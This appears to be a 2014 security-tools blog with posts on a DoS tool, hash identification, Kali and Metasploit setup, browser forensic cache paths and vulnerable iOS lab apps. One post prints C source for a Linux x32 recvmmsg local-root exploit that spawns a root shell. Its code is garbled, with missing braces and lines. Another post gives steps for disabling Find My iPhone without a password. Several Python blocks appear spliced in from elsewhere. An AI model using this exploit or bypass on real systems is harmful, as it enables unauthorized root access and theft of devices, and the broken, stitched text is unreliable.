Feb 7, 2014

Tools: GoldenEye - HTTP DoS test tool

GoldenEye is a Python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is an HTTP DoS test tool.
Attack vector exploited: HTTP Keep-Alive + NoCache

Source: https://github.com/jseidl/GoldenEye

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: HashTag – Password Hash Type Identification (Identify Hashes)

HashTag.py is a Python script written to parse and identify the password hash type used.
HashTag supports the identification of over 250 hash types along with matching them to over 110 hashcat modes (use the command line switch -hc to output the hashcat modes). It is also able to identify a single hash, parse a single file and identify the hashes within it, or traverse a root directory and all subdirectories for potential hash files and identify any hashes found.

One of the biggest aspects of this tool is the identification of password hashes. The main attributes used to distinguish between hash types are character set (hexadecimal, alphanumeric, etc.), hash length, hash format (e.g. 32 character hash followed by a colon and a salt), and any specific substrings (e.g. ‘$1$’). A lot of password hash strings can’t be identified as one specific hash type based on these attributes. For example, MD5 and NTLM hashes are both 32 character hexadecimal strings. In these cases the author made an exhaustive list of possible types and has the tool output reflect that.
It has three main arguments:
  • Identifying a single hash type (-sh)
  • Parsing and identifying multiple hashes from a file (-f)
  • Traversing subdirectories to locate files which contain hashes and parse/identify them (-d)
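The attribute-based identification described above, as an added example that is not HashTag's own code: a constructed rule table keyed on character set, length, hash:salt layout and magic prefixes, returning every candidate type for one string (like -sh) or for each line of a file (like -f), with an optional hashcat-mode lookup like -hc. The rules and the hashcat numbers are a small constructed subset, not HashTag's 250-type table.

```python
import re

HEX = r"[0-9a-fA-F]"

# Candidate formats keyed on the attributes HashTag uses: character set, length, layout
# (hash:salt) and magic prefixes. A constructed subset for this example, not HashTag's table.
RULES = [
    (["MD5", "NTLM", "MD4", "LM"], rf"{HEX}{{32}}"),   # 32 hex chars: ambiguous
    (["SHA-1", "RIPEMD-160"], rf"{HEX}{{40}}"),        # 40 hex chars: ambiguous
    (["SHA-256"], rf"{HEX}{{64}}"),
    (["MD5 + salt (hash:salt)"], rf"{HEX}{{32}}:.+"),
    (["MySQL 4.1+"], rf"\*{HEX}{{40}}"),
    (["MD5crypt"], r"\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}"),
    (["SHA-512crypt"], r"\$6\$(rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}"),
    (["bcrypt"], r"\$2[abxy]?\$\d{2}\$[./0-9A-Za-z]{53}"),
]

# hashcat -m numbers for the types above, the kind of mapping HashTag's -hc switch prints.
HASHCAT_MODES = {"MD5": 0, "NTLM": 1000, "MD4": 900, "LM": 3000, "SHA-1": 100, "RIPEMD-160": 6000,
                 "SHA-256": 1400, "MD5 + salt (hash:salt)": 10, "MySQL 4.1+": 300,
                 "MD5crypt": 500, "SHA-512crypt": 1800, "bcrypt": 3200}

def identify(candidate, hashcat=False):
    """Every type the string could be (an ambiguous hash yields several), like HashTag's -sh."""
    s = candidate.strip()
    names = [n for ns, pat in RULES if re.fullmatch(pat, s) for n in ns]
    return [(n, HASHCAT_MODES[n]) for n in names] if hashcat else names

def identify_lines(text):
    """Identify each non-empty line of a hash file's contents, like HashTag's -f on one file."""
    return {ln.strip(): identify(ln) for ln in text.splitlines() if ln.strip()}

# Constructed sample file contents.
SAMPLE = "\n".join([
    "5f4dcc3b5aa765d61d8327deb882cf99",       # MD5("password"); also a valid NTLM/MD4/LM shape
    "5f4dcc3b5aa765d61d8327deb882cf99:s4lt",  # hash:salt layout
    "$1$abcdefgh$" + "a" * 22,                # md5crypt layout with a dummy hash part
    "*A4B6157319038724E3560894F7F932C8886EBFCF",  # MySQL 4.1+ layout, dummy digits
    "not-a-hash",
])

if __name__ == "__main__":
    for line, types in identify_lines(SAMPLE).items():
        print(f"{line}: {types or 'unknown'}")
```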

You can download HashTag here:

Source:  http://www.darknet.org.uk/2013/11/hashtag-password-hash-type-identification-identify-hashes/


Howto: Build a custom Kali KDE image

1. Install required packages with this command:
apt-get install cdebootstrap kali-archive-keyring

2. Clone the build environment with:
git clone git://git.kali.org/live-build-config.git

3. The build environment is in a directory called live-build-config. The next step is to change (cd) into that directory and start messing with it. So type this command:
cd live-build-config

4. Then run this command:
lb build
The system will respond with an error message and will output a command for you to run that takes care of the cause of the error. The command it outputs is:
ln -sf wheezy /usr/share/live/build/data/debian-cd/kali

5. Make your modifications to the OS.

6. Run this command:
lb config --architecture i386

7. Build the OS:
lb build

Source: http://www.linuxbsdos.com/2013/03/29/how-to-live-build-a-custom-kali-linux-iso-for-kde-lxde-xfce-and-e17/  


Howto: iOS 7 Bug Allows Disabling of 'Find My iPhone' Without Password

1. Go to the iCloud menu.

2. Go to your account (first menu).

3. Type a wrong password.

4. Cancel it and go back from your account.

5. Go to your account again.

6. Delete the description of your account (normally it is iCloud).

7. Done.

8. Check your Find My iPhone settings; it is off.

Source: http://www.macrumors.com/2014/02/06/disable-find-my-iphone/


Feb 5, 2014

Howto: Code examples for the new functions of iOS 7.

Code examples for the new functions of iOS 7.

Source: https://github.com/shu223/iOS7-Sampler?source=c


Howto: Install Metasploit in Kali

1. Install packages with apt-get:
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git autoconf curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby-dev

2. Clone the Metasploit source code from GitHub:
git clone https://github.com/rapid7/metasploit-framework.git

3. Go to the Metasploit folder:
cd metasploit-framework

4. Install the required Ruby libraries:
bundle install

5. Create the Metasploit database and user in PostgreSQL:
su - postgres
createuser msf -P -S -R -D
createdb -O msf msf

6. Go to the Metasploit configuration folder:
cd ~/.msf4

7. Create the Metasploit database configuration file:
vim database.yml

    adapter: postgresql
    database: msf
    user: msf
    password: <from #5>
    port: 5432
    pool: 75
    timeout: 5

8. Start the Metasploit console.


Feb 4, 2014

Webmail Forensic Path In Browser

Internet Explorer

Since Internet Explorer (IE) is installed by default on most Windows installations, it’s likely the most commonly used and should always be searched when looking for webmail—or any browsing artifacts for that matter. Depending on the version of Windows and IE installed, the evidence will be stored in different locations. The locations are listed below:
  • WinXP – %root%/Documents and Settings/%userprofile%/Local Settings/Temporary Internet Files/Content.IE5
  • Win Vista/7 – %root%/Users/%userprofile%/AppData/Local/Microsoft/Windows/Temporary Internet Files/Content.IE5
  • Win Vista/7 – %root%/Users/%userprofile%/AppData/Local/Microsoft/Windows/Temporary Internet Files/Low/Content.IE5
  • Win8/IE10 – %root%/Users/%userprofile%/AppData/Local/Microsoft/Windows/History
Note: Internet Explorer 10 is available on Windows 7 as well. If IE9 was installed and then upgraded to IE10, there will be two sources of evidence (the index.dat file from IE9 and the database within the webcache folder for IE10).

Mozilla Firefox

Firefox is a very popular browser and also stores its cache data in various locations based on the operating system installed. It’s installed as the default browser on many Linux distributions and is available for MacOS-X as well.
  • WinXP – %root%/Documents and Settings/%userprofile%/Local Settings/Application Data/Mozilla/Firefox/Profiles/*.default/Cache
  • Win7/8 – %root%/Users/%userprofile%/AppData/Local/Mozilla/Firefox/Profiles/*.default/Cache
  • Linux – /home/%userprofile%/.mozilla/firefox/$PROFILE.default/Cache
  • MacOS-X – /Users/%userprofile%/Library/Caches/Firefox/Profiles/$PROFILE.default/Cache/

Google Chrome

Google Chrome is also one of the top 3 browsers used today. It is available for Windows, Linux, and MacOS-X. Google also makes the Chromium open source project available to Linux users; it runs very similarly to the regular Chrome package, with some minor differences.
  • WinXP – %root%/Documents and Settings/%userprofile%/Local Settings/Application Data/Google/Chrome/User Data/Default/Cache
  • Win7/8 – %root%/Users/%userprofile%/AppData/Local/Google/Chrome/User Data/Default/Cache
  • Linux – /home/%userprofile%/.config/google-chrome/Default/Application Cache/Cache/
  • MacOS-X – /Users/%userprofile%/Caches/Google/Chrome/Default/Cache/
Source: http://articles.forensicfocus.com/2014/02/01/webmail-forensics-digging-deeper-into-browsers-and-mobile-applications/
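A triage helper for the locations listed above, added here and not taken from the Forensic Focus article: given a mounted volume root and an OS family, it expands the per-user and *.default profile wildcards and reports which cache directories actually exist, with a file count for each. The sample volume it builds is constructed; the Windows 8/IE10 and MacOS-X entries are left out.

```python
import glob
import os
import tempfile

# Cache directories from the lists above, relative to the volume root; {user} stands for the
# account name and the *.default glob covers Firefox's randomly named profile directory.
CACHE_PATHS = {
    "winxp": [
        "Documents and Settings/{user}/Local Settings/Temporary Internet Files/Content.IE5",
        "Documents and Settings/{user}/Local Settings/Application Data/Mozilla/Firefox/Profiles/*.default/Cache",
        "Documents and Settings/{user}/Local Settings/Application Data/Google/Chrome/User Data/Default/Cache",
    ],
    "win7": [
        "Users/{user}/AppData/Local/Microsoft/Windows/Temporary Internet Files/Content.IE5",
        "Users/{user}/AppData/Local/Microsoft/Windows/Temporary Internet Files/Low/Content.IE5",
        "Users/{user}/AppData/Local/Mozilla/Firefox/Profiles/*.default/Cache",
        "Users/{user}/AppData/Local/Google/Chrome/User Data/Default/Cache",
    ],
    "linux": [
        "home/{user}/.mozilla/firefox/*.default/Cache",
        "home/{user}/.config/google-chrome/Default/Application Cache/Cache",
    ],
}
HOME_GLOBS = {"winxp": "Documents and Settings/*", "win7": "Users/*", "linux": "home/*"}

def find_caches(root, family):
    """Map each user under a mounted volume to the cache dirs that exist, with a file count per dir."""
    found = {}
    for home in sorted(glob.glob(os.path.join(root, HOME_GLOBS[family]))):
        user = os.path.basename(home)
        hits = []
        for pattern in CACHE_PATHS[family]:
            for d in sorted(glob.glob(os.path.join(root, pattern.format(user=user)))):
                if os.path.isdir(d):
                    count = sum(len(files) for _, _, files in os.walk(d))
                    hits.append((os.path.relpath(d, root), count))
        if hits:
            found[user] = hits
    return found

def build_demo_volume():
    """Constructed stand-in for a mounted Windows 7 volume: one Firefox cache file, an empty Chrome cache."""
    root = tempfile.mkdtemp()
    ff = os.path.join(root, "Users/alice/AppData/Local/Mozilla/Firefox/Profiles/x1y2z3.default/Cache")
    os.makedirs(ff)
    open(os.path.join(ff, "_CACHE_001_"), "w").close()
    os.makedirs(os.path.join(root, "Users/alice/AppData/Local/Google/Chrome/User Data/Default/Cache"))
    return root
```

Point it at a read-only mount of an acquired image (for example `find_caches("/mnt/evidence", "win7")`) rather than a live system, so the counts are taken from the evidence copy.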


Videos: AppSec California 2014



Feb 3, 2014

Tools: Linux kernel 3.4+ local root (CONFIG_X86_X32=y)

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200
int port;
struct offset {
    char *kernel_version;
    unsigned long dest; // net_sysctl_root + 96
    unsigned long original_value; // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;
    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        servaddr.sin_family = AF_INET;
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
void trigger() {
    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
    return -1;
void __attribute__((regparm(3)))
    asm("mov $getroot, %rax; call *%rax;");
int main(void)
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;
    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;
    port = (rand() % 30000)+1500;
    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
    if(mmapped == -1) {
    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
    memset(msgs, 0, sizeof(msgs));
    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;
    for(i=0;i < 3 ;i++) {
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
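An added exposure check, not part of the exploit above: it flags a host on which the precondition named in the title holds, a 3.4+ kernel built with CONFIG_X86_X32=y, and whether the running release is one of the three the offsets[] table above carries. Run on a host it reads the config from /proc/config.gz or /boot/config-<release>; the config strings used for checking it are constructed.

```python
import gzip
import os
import platform
import re

# Kernel releases for which the exploit above carries offsets (copied from its offsets[] table).
KNOWN_TARGETS = {"3.11.0-15-generic", "3.11.0-12-generic", "3.8.0-19-generic"}

def kernel_version(release):
    """'3.11.0-15-generic' -> (3, 11, 0); None if the release string does not parse."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    return tuple(int(x or 0) for x in m.groups()) if m else None

def x32_enabled(config_text):
    """True when the kernel config contains CONFIG_X86_X32=y, the build option the title names."""
    return re.search(r"^CONFIG_X86_X32=y$", config_text, re.M) is not None

def assess(release, config_text):
    """Exposed only if the kernel is 3.4 or newer and was built with the x32 ABI."""
    ver = kernel_version(release)
    x32 = x32_enabled(config_text)
    exposed = ver is not None and ver >= (3, 4) and x32
    return {"release": release, "version": ver, "x32": x32,
            "exposed": exposed, "offsets_in_exploit": release in KNOWN_TARGETS}

def load_running_config(release):
    """Read the running kernel's config from /proc/config.gz or /boot/config-<release>, else ''."""
    if os.path.exists("/proc/config.gz"):
        with gzip.open("/proc/config.gz", "rt") as f:
            return f.read()
    path = f"/boot/config-{release}"
    if os.path.exists(path):
        with open(path) as f:
            return f.read()
    return ""

if __name__ == "__main__":
    rel = platform.release()
    print(assess(rel, load_running_config(rel)))
```

A kernel without the x32 ABI, or one older than 3.4, does not meet the precondition, so "exposed" is a necessary-condition check and a True result means the kernel should be patched, not that this particular binary would succeed on it.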


Tools: iOS Vulnerability LAB

Damn Vulnerable iOS Application

Damn Vulnerable iOS Application was born from the need to have a tool where a user can test their iOS penetration testing skills in a safe and legal environment. This application can also be used by mobile security enthusiasts and students to learn or review the basics of mobile application security.



The OWASP iGoat project is a security learning tool for iOS developers to learn about security weaknesses in iOS -- by breaking things as well as fixing them.
iGoat is available ONLY in source code format, and this is the official repository for that code.
On the Downloads tab here, you will find the full iGoat source tree in tar format, or you can go to the Source tab for instructions on using Mercurial to grab (or clone) the source tree.
Be sure to also check out the Wiki tab here for useful documents related to the iGoat project. 
